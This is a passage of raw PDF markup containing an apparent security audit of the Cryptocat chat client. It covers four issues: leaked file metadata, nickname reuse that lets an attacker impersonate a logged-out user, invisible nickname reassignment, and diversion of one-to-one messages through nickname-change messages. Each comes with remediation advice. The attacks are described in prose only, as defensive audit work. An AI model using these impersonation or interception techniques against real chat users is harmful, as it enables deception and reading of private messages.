0 if that buddy disconnects from and reconnects to the server.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (In particular, the global ) Tj /F4 10 Tf (replaceWith ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (Cryptocat.addFile ) Tj /F1 10 Tf (can be removed.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm Q endstream endobj % 'R188': class PDFStream 188 0 obj % page stream << /Length 8399 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue D. File Name, Mimetype, and Size Lack Confidentiality) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 26 Tm .19061 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (The file transfer protocol relies on the ) Tj 0 0 .501961 rg (SI File Transfer) Tj 0 0 0 rg ( ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol extension to transmit file) Tj T* 0 Tw 1.724269 Tw (metadata prior to transfer. These metadata are transmitted outside of ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (and lack its confidentiality) Tj T* 0 Tw (features.) Tj T* ET Q Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 14 Tm .139269 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (An eavesdropper may discover filenames, ) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (types, and sizes of transferred files. The privacy) Tj T* 0 Tw (impact of this exposure is quite limited:) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm Q q 1 0 0 1 62.69291 651.0236 cm Q q 1 0 0 1 62.69291 627.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.24229 Tw (Filenames are currently randomly generated for each transfer and not associated with the original) Tj T* 0 Tw (source file.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 621.0236 cm Q q 1 0 0 1 62.69291 597.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.893318 Tw 12 TL /F3 10 Tf 0 0 0 rg (MIME ) Tj /F1 10 Tf (types are restricted to images and zipfiles, so attackers only learn which of these two) Tj T* 0 Tw (categories a file is in.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 591.0236 cm Q q 1 0 0 1 62.69291 579.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Sizes are in exact bytes, but the size is revealed in any case by the length of the file ciphertext.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 579.0236 cm Q q 1 0 0 1 62.69291 549.0236 cm q BT 1 0 0 1 0 14 Tm .049985 Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (An attacker must have access to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (traffic $or the container protocol traffic: ) Tj /F3 10 Tf (BOSH ) Tj /F1 10 Tf (and) Tj T* 0 Tw /F3 10 Tf (HTTP) Tj /F1 10 Tf ($. This access is possible through several vectors:) Tj T* ET Q Q q 1 0 0 1 62.69291 543.0236 cm Q q 1 0 0 1 62.69291 543.0236 cm Q q 1 0 0 1 62.69291 519.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.204597 Tw (A server compromise $including malicious insiders$ could allow live traffic sniffing to recover these) Tj T* 0 Tw (messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 513.0236 cm Q q 1 0 0 1 62.69291 501.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (A server host compromise may grant access to log files containing recorded messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 495.0236 cm Q q 1 0 0 1 62.69291 483.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Browser logs or caches may contain recorded messages.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 477.0236 cm Q q 1 0 0 1 62.69291 453.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.24229 Tw 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is deployed $including the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service$, an active ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (attack against) Tj T* 0 Tw /F3 10 Tf (TLS ) Tj /F1 10 Tf (protected servers could be used to leverage this attack.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 447.0236 cm Q q 1 0 0 1 62.69291 435.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Where ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (is ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (used, this attack is feasible at an unknown number of routers on the Internet.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 435.0236 cm Q q 1 0 0 1 62.69291 405.0236 cm q BT 1 0 0 1 0 14 Tm 1.987126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (We verified this issue by using Chrome's developer console to view the IBB messages) Tj T* 0 Tw (transmitted over HTTPS, for example:) Tj T* ET Q Q q 1 0 0 1 62.69291 222.2617 cm q q .96447 0 0 .96447 0 0 cm q 1 0 0 1 6.6 6.843137 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 486 180 re B* Q q BT 1 0 0 1 0 158 Tm 12 TL /F7 10 Tf 0 .501961 0 rg (<) Tj (body) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (rid=) Tj .729412 .129412 .129412 rg ("3814497183") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (sid=) Tj .729412 .129412 .129412 rg ("e58708cb6438d43ffe6732dcd3ff855f1d690978") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/httpbind") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (iq) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (id=) Tj .729412 .129412 .129412 rg ("3075:si-filetransfer") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (to=) Tj .729412 .129412 .129412 rg ("cryptocataudit@conference.crypto.cat/daira") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (type=) Tj .729412 .129412 .129412 rg ("set") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("jabber:client") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (si) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (id=) Tj .729412 .129412 .129412 rg ("3074") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (mime-type=) Tj .729412 .129412 .129412 rg ("application/zip") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (profile=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si/profile/file-transfer") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si") Tj /F7 10 Tf 0 .501961 0 rg (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (file) Tj /F4 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (name=) Tj .729412 .129412 .129412 rg ("229f1c684a5324e50fd5c03b996f8d87.zip") Tj 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (size=) Tj .729412 .129412 .129412 rg ("158") Tj 0 0 0 rg T* ( ) Tj .490196 .564706 .160784 rg (xmlns=) Tj .729412 .129412 .129412 rg ("http://jabber.org/protocol/si/profile/file-transfer") Tj /F7 10 Tf 0 .501961 0 rg (/) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( [...]) Tj T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (/si) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( ) Tj /F7 10 Tf 0 .501961 0 rg (<) Tj (/iq) Tj (>) Tj /F4 10 Tf 0 0 0 rg T* ( [...]) Tj T* /F7 10 Tf 0 .501961 0 rg (<) Tj (/body) Tj (>) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 202.2617 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (In any newly designed file transfer protocol, ensure that metadata is encrypted.) Tj T* ET Q Q q 1 0 0 1 62.69291 202.2617 cm Q endstream endobj % 'R189': class PDFStream 189 0 obj % page stream << /Length 7380 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 21 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue E. You Log Out, Attacker Logs in with the same Nickname,) Tj T* (Your Friend Thinks The Attacker is You) Tj T* ET Q Q q 1 0 0 1 62.69291 711.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 681.0236 cm q BT 1 0 0 1 0 14 Tm .864104 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (uses an identification model in which a client that knows the name of a channel is) Tj T* 0 Tw (able to log in to that channel and claim any unused nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 651.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .334198 Tw (Users may believe that an attacker using a given nickname is the same party as the previous user of that) Tj T* 0 Tw (nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 597.0236 cm q BT 1 0 0 1 0 38 Tm 2.141163 Tw 12 TL /F1 10 Tf 0 0 0 rg (This risk is intended to be mitigated by the use of the Socialist Millionaire Protocol $) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf ($. Within a) Tj T* 0 Tw 2.237633 Tw (pairwise session between two users, it is possible to use the ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to verify shared knowledge of a) Tj T* 0 Tw 1.923555 Tw (prearranged secret. However, a pair of users who wished to authenticate all of their communications) Tj T* 0 Tw (would need to repeat the ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (on ) Tj /F3 10 Tf (every ) Tj /F1 10 Tf (pairwise session between those users.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q BT 1 0 0 1 0 14 Tm .107882 Tw 12 TL /F1 10 Tf 0 0 0 rg ($A "pairwise session" in this sense ends when either user logs out. It is not the same as the ) Tj /F3 10 Tf (Diffie-Hellman) Tj T* 0 Tw /F1 10 Tf (sessions involved in Issues A and B.$) Tj T* ET Q Q q 1 0 0 1 62.69291 477.0236 cm q 0 0 0 rg BT 1 0 0 1 0 74 Tm /F1 10 Tf 12 TL 1.645318 Tw (This issue could be exacerbated if the attacker observes the session status, for example, an attacker) Tj T* 0 Tw 1.401235 Tw (could watch the status of the $encrypted$ conversation between Alice and Bob, then see that Bob has) Tj T* 0 Tw 1.162927 Tw (logged out, then log in and choose the nickname "Bob", then initiate a conversation with Alice and say) Tj T* 0 Tw .778735 Tw (\223One more thing\205\224. The timing of the initiation of the new session, and the natural-sounding \223One more) Tj T* 0 Tw 1.705318 Tw (thing\205\224 would trigger Alice's social response to a resumed conversation and may make her forget to) Tj T* 0 Tw 1.525542 Tw (question whether this is a different user. This is an example of using social engineering as part of an) Tj T* 0 Tw (attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 399.0236 cm q BT 1 0 0 1 0 62 Tm 1.926098 Tw 12 TL /F1 10 Tf 0 0 0 rg (Another way this issue could be exacerbated is if the attacker can force a user to disconnect. If the) Tj T* 0 Tw 2.045433 Tw (attacker controls the Cryptocat server, can Man-In-The-Middle the ) Tj /F3 10 Tf (HTTP$S$ ) Tj /F1 10 Tf (connections between the) Tj T* 0 Tw 1.772209 Tw (clients and the server, or can use a Denial-of-Service attack on one of the clients, they can cause a) Tj T* 0 Tw 1.129982 Tw (disconnect. For example, an attacker could observe an $encrypted$ conversation in progress, force one) Tj T* 0 Tw .709985 Tw (party to disconnect from the Cryptocat server, log in and choose the nickname that party was previously) Tj T* 0 Tw (using, establish a session with the other party, and then say \223Sorry. What were you saying?\224.) Tj T* ET Q Q q 1 0 0 1 62.69291 357.0236 cm q BT 1 0 0 1 0 26 Tm 2.424651 Tw 12 TL /F1 10 Tf 0 0 0 rg (This issue is exacerbated by the wording of login messages. Suppose that Alice performs an ) Tj /F3 10 Tf (SMP) Tj T* 0 Tw .806235 Tw /F1 10 Tf (verification with Bob; then Bob logs out and someone claiming the nickname "Bob" logs in. Alice's client) Tj T* 0 Tw (will display this to her as "Bob logged in.", but there is no assurance that this is the same Bob.) Tj T* ET Q Q q 1 0 0 1 62.69291 255.0236 cm q BT 1 0 0 1 0 86 Tm .53528 Tw 12 TL /F1 10 Tf 0 0 0 rg (Using ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to gain assurance of the identity of the counterparty is inconvenient. Each run of the protocol) Tj T* 0 Tw 2.967485 Tw (requires 6 mouse clicks and entry of the secret question and answer from the initiating user; the) Tj T* 0 Tw 1.854985 Tw (responding user needs to answer the question and make 2 mouse clicks. The initiating user gets an) Tj T* 0 Tw .056905 Tw (indication that the protocol succeeded, but the responding user does not. Therefore, mutual authentication) Tj T* 0 Tw .45104 Tw (requires at least 8 mouse clicks in each session from both users, plus one entry of a secret question and) Tj T* 0 Tw .421984 Tw (two entries of a secret answer from both users, plus any out-of-band communication and thought needed) Tj T* 0 Tw 1.050651 Tw (to agree on the question and answer. This assumes that the authentication succeeds in both directions) Tj T* 0 Tw (first time, and does not need to be retried.) Tj T* ET Q Q q 1 0 0 1 62.69291 225.0236 cm q BT 1 0 0 1 0 14 Tm .653516 Tw 12 TL /F1 10 Tf 0 0 0 rg (After the initial dialog in the initiator's client confirming that ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (has succeeded, there is no indication in) Tj T* 0 Tw (the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface that a successful ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (run has been completed with a given user.) Tj T* ET Q Q q 1 0 0 1 62.69291 195.0236 cm q BT 1 0 0 1 0 14 Tm 1.320574 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note that temporary network outages may also cause users to log out and then in again. Under some) Tj T* 0 Tw (conditions, this could be sufficiently frequent to make it impractical to run ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (on each pairwise session.) Tj T* ET Q Q q 1 0 0 1 62.69291 165.0236 cm q BT 1 0 0 1 0 14 Tm .063059 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Observations of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface during experiments in which different clients log) Tj T* 0 Tw (in with the same nickname.) Tj T* ET Q Q q 1 0 0 1 62.69291 147.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F2 10 Tf 12 TL (Suggested Mitigations/Remediations:) Tj T* ET Q Q q 1 0 0 1 62.69291 141.0236 cm Q q 1 0 0 1 62.69291 141.0236 cm Q q 1 0 0 1 62.69291 117.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.556235 Tw (Change the login message from "Bob logged in." to "Someone logged in and chose to be called) Tj T* 0 Tw ('Bob'.") Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 111.0236 cm Q q 1 0 0 1 62.69291 99.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Distinguish nicknames of users that have completed ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (in the current pairwise session.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 93.02362 cm Q endstream endobj % 'R190': class PDFStream 190 0 obj % page stream << /Length 3137 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .706651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Try to reduce the inconvenience of performing ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (. For example, in principle it should be possible) Tj T* 0 Tw .348735 Tw (to achieve mutual authentication with a single run of ) Tj /F3 10 Tf (SMP) Tj /F1 10 Tf (. $A complicating factor is that the initiating) Tj T* 0 Tw (user is able to choose the question, which may give an attacker an advantage.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 687.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.628443 Tw (Consider changing the identification model to give clients more persistent keys. This would allow) Tj T* 0 Tw .132209 Tw (implementing the option for a user to "pin" a nickname to a given public key. For privacy reasons this) Tj T* 0 Tw (would need to be an explicit user action, and it would need to be possible to delete pinnings.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 681.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.817984 Tw 12 TL /F1 10 Tf 0 0 0 rg (Consider assigning random nicknames every time on join. This is done by Google to manage a) Tj T* 0 Tw 1.46816 Tw (similar identification issue \227 unauthenticated users connecting to a shared resource $) Tj 0 0 .501961 rg (anonymous) Tj T* 0 Tw 1.099984 Tw (animals in Google Drive) Tj 0 0 0 rg ($. This might fit in well with ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s branding; ) Tj /F3 10 Tf (users could be assigned) Tj T* 0 Tw (cute cat names and icons) Tj /F1 10 Tf (!) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 591.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.98784 Tw (Consider preventing the same nickname from being reused with a different public key for some) Tj T* 0 Tw .373318 Tw (timeout period. $This would occasionally cause false positives, e.g. if a user reloads Cryptocat and it) Tj T* 0 Tw (generates a new key pair, they would have to pick a new nickname temporarily.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 591.0236 cm Q q 1 0 0 1 62.69291 561.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .08311 Tw (We also suggest performing a user study to investigate the assumptions that users have about the current) Tj T* 0 Tw (interface and any intended changes.) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm Q endstream endobj % 'R191': class PDFStream 191 0 obj % page stream << /Length 2899 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue F. Nicknames Can Be Invisibly Reassigned) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 675.0236 cm q BT 1 0 0 1 0 38 Tm .857608 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (A user may see no sign at all of an Issue E attack: in the window for one-to-one chat with a) Tj T* 0 Tw .712619 Tw (specific buddy, there is no indication when a buddy has logged out. Therefore, if a user is looking at the) Tj T* 0 Tw .382209 Tw (one-to-one chat, there is no way for them to know that the session for which ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (succeeded has ended.) Tj T* 0 Tw (In fact, an attacker may be able to force it to end.) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 6.346136 Tw (A suspicious and diligent user could discover the reassignment by switching back to the) Tj T* 0 Tw .298314 Tw (main-conversation window and scanning the conversational transcript for the relevant notifications of their) Tj T* 0 Tw (buddy parting and joining, potentially buried among chitchat and other events.) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .567356 Tw (There is potentially also an audio notification when any buddy joins or leaves, but this is not specific to a) Tj T* 0 Tw (particular buddy, and may be switched off or otherwise not audible.) Tj T* ET Q Q q 1 0 0 1 62.69291 573.0236 cm q BT 1 0 0 1 0 14 Tm .099269 Tw 12 TL /F1 10 Tf 0 0 0 rg (This vulnerability could also potentially allow an attacker to get away with performing a Man-In-The-Middle) Tj T* 0 Tw (attack that is interrupted just during an ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (protocol run, in order to allow ) Tj /F3 10 Tf (SMP ) Tj /F1 10 Tf (to succeed.) Tj T* ET Q Q q 1 0 0 1 62.69291 555.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (Observations of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (user interface, confirmed by source code inspection.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q BT 1 0 0 1 0 14 Tm 1.601395 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis: ) Tj /F1 10 Tf (In ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (buddyNotification ) Tj /F1 10 Tf (tests for 'main-Conversation') Tj T* 0 Tw (and shows the change of status only in that case.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 14 Tm .327485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (Show the status changes as they occur, and also when the user returns to the) Tj T* 0 Tw (main conversation.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm Q endstream endobj % 'R192': class PDFStream 192 0 obj % page stream << /Length 7380 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issue G. Capture of Sent Messages by Nickname Change) Tj T* ET Q Q q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Reported: ) Tj /F1 10 Tf (2014-01-26) Tj T* ET Q Q q 1 0 0 1 62.69291 687.0236 cm q BT 1 0 0 1 0 26 Tm .082485 Tw 12 TL /F2 10 Tf 0 0 0 rg (Synopsis: ) Tj /F1 10 Tf (An attacker is able to break the confidentiality of a one-to-one chat, by diverting the destination) Tj T* 0 Tw 2.201235 Tw (of outgoing chat messages and replacing the key used to encrypt them. The attack involves use of) Tj T* 0 Tw (nickname-change ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (messages, which are not sent by ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (but are acted on when received.) Tj T* ET Q Q q 1 0 0 1 62.69291 633.0236 cm q BT 1 0 0 1 0 38 Tm .962927 Tw 12 TL /F2 10 Tf 0 0 0 rg (Impact: ) Tj /F1 10 Tf (After the diversion, the attacker receives and is able to decrypt messages sent by the victim in) Tj T* 0 Tw 1.201318 Tw (the chat. The original recipient$s$ do not receive these messages. The sender$s$ see no indication that) Tj T* 0 Tw .918735 Tw (their sent messages have been diverted; however, they will not receive any further messages or files in) Tj T* 0 Tw (that chat from the original buddy or from the attacker.) Tj T* ET Q Q q 1 0 0 1 62.69291 567.0236 cm q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL .499985 Tw (For example, suppose Mallory is the attacker and is targetting a one-to-one chat between Alice and Bob.) Tj T* 0 Tw 2.412093 Tw (Mallory first sets up a chat with Alice $this need only last a short time$, and then sends a specific) Tj T* 0 Tw .465318 Tw (nickname-change message to Alice's client. After that point, Alice's messages sent to Bob will instead go) Tj T* 0 Tw .350651 Tw (to Mallory, encrypted using the keys established between Alice and Mallory $and so readable by Mallory$.) Tj T* 0 Tw (Alice will receive no further messages in that chat.) Tj T* ET Q Q q 1 0 0 1 62.69291 525.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.24936 Tw (The attack can optionally also be performed in the other direction, causing Bob's messages to Alice to) Tj T* 0 Tw .158935 Tw (instead be sent to and readable by Mallory. In that case Bob will receive no further messages or files from) Tj T* 0 Tw (Alice in the chat.) Tj T* ET Q Q q 1 0 0 1 62.69291 495.0236 cm q BT 1 0 0 1 0 14 Tm .800514 Tw 12 TL /F1 10 Tf 0 0 0 rg (This attack cannot be used to gain the contents of files. After this attack, files will ) Tj /F3 10 Tf (not ) Tj /F1 10 Tf (be sent encrypted) Tj T* 0 Tw (under Mallory's key. Instead files will not be sent at all after this attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 441.0236 cm q BT 1 0 0 1 0 38 Tm .495697 